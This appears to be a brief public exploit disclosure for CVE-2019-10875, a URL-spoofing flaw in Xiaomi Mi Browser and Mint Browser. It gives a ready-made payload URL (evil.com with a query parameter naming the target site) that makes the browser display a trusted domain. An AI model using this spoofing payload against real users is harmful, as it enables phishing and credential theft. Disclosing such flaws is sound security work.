`# Exploit Title: URL Spoofing Exploit for Xiaomi Mi Browser (v10.5.6-g) and Mint Browser (v1.5.3)
# Date : 11/04/2019
# Exploit Author: Arif Khan (@payloadartist)
# Vendor Homepage: www.xiaomi.com
# Version : v10.5.6-g and v1.5.3
# Tested On : MIUI OS, v10.1.3.0
# CVE : CVE-2019-10875
Exploit: https://www.evil.com/?q=www.target.com
The attacker can thus pass off his site, www.evil.com as www.target.com due to the way Xiaomi browsers handle the query parameter's value.
`